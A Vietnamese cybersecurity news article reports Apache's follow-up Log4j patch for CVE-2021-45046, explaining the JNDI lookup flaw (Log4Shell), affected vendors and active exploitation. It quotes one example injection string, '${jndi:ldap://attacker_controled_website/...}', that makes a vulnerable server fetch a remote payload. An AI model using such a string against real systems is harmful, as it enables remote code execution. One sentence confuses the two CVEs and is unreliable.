Tin An Ninh Mạng

Apache phát hành bản vá cho lỗ hổng thứ hai trên Log4j

Apache Software Foundation (ASF) vừa tiếp tục đưa ra bản sửa lỗi mới cho Log4j. CVE-2021-45046 ảnh hưởng đến tất cả các phiên bản của Log4j từ 2.0-beta9 đến 2.12.1 và 2.13.0 đến 2.15.0.

Bản vá cho lỗ hổng CVE-2021-44228, là lỗi có thể bị lợi dụng để “tạo dữ liệu đầu vào độc bằng cách sử dụng mẫu Tra cứu JNDI, dẫn đến tấn công từ chối dịch vụ (DoS)”. Phiên bản mới nhất của Log4j, 2.16.0 (dành cho người dùng yêu cầu Java 8 trở lên). Người dùng Java 7 được khuyến nghị nâng cấp lên bản phát hành Log4j 2.12.2.

{

}

Log4j-vulnerability (1).jpg

JNDI viết tắt của Java Naming and Directory Interface, là một API Java cho phép các ứng dụng được mã hóa bằng ngôn ngữ lập trình, tìm kiếm dữ liệu và tài nguyên như máy chủ LDAP. Log4Shell nằm trong thư viện Log4j, một khung ghi nhật ký mã nguồn mở trên Java thường được tích hợp vào các máy chủ web Apache.

Sự cố tự xảy ra khi thành phần JNDI của trình kết nối LDAP được tận dụng để đưa yêu cầu LDAP độc hại – chẳng hạn như “$ {jndi: ldap: // attacker_controled_website / payload_to_be_executed}” – tức là khi đăng nhập trên máy chủ web chạy phiên bản dễ bị tấn công của thư viện, cho phép kẻ xấu truy xuất và thực thi payload từ xa.

Lỗ hổng tồn tại trong công cụ được sử dụng phổ biến trong các ứng dụng Java, là động cơ cho kẻ xấu nhòm ngó tấn công hàng triệu thiết bị trên khắp thế giới.

Đáng lo hơn với các tổ chức là lỗ hổng ảnh hưởng đến hàng trăm sản phẩm doanh nghiệp lớn từ một số công ty như: Akamai, Amazon, Apache, Apereo, Atlassian, Broadcom, Cisco, Cloudera, ConnectWise, Debian, Docker, Fortinet, Google, IBM, Intel, Juniper Networks, Microsoft, Okta, Oracle, Red Hat, SolarWinds, SonicWall, Splunk, Ubuntu, VMware, Zscaler và Zoho, điều này đặt ra rủi ro cho chuỗi cung ứng phần mềm.

Sau khi được công bố, ít nhất đã có mười nhóm hacker khác nhau tiến hành khai thác lỗ hổng và khoảng 44% mạng công ty trên toàn cầu đã bị tấn công. Cơ quan An ninh mạng và Cơ sở hạ tầng Hoa Kỳ (CISA) cũng đã thêm Log4Shell vào Danh mục các lỗ hổng đang được khai thác và đưa ra hạn chót là ngày 24 tháng 12 cho các cơ quan liên bang để cập nhật các bản vá cho lỗ hổng.

Các bài đưa tin nhiều quá mà chưa thấy có bài tổng hợp để ae có biết cách xử lý:
– Các phần mềm, dịch vụ nào bị ảnh hưởng.
– Các thức khắc phục: update, upgrade, disable packet…
Các bài đưa tin nhiều quá mà chưa thấy có bài tổng hợp để ae có biết cách xử lý:
– Các phần mềm, dịch vụ nào bị ảnh hưởng.
– Các thức khắc phục: update, upgrade, disable packet…

Bạn có thể tham khảo bài này nhé: https://whitehat.vn/threads/khan-ca…en-log4j-trong-java-da-co-ma-khai-thac.15831/

Đăng ký liền tay Nhận Ngay Bài Mới

Subscribe ngay

Cám ơn bạn đã đăng ký !

Lỗi đăng ký !

Add Comment

Click here to post a comment

Đăng ký liền tay
Nhận Ngay Bài Mới

Subscribe ngay

Cám ơn bạn đã đăng ký !

Lỗi đăng ký !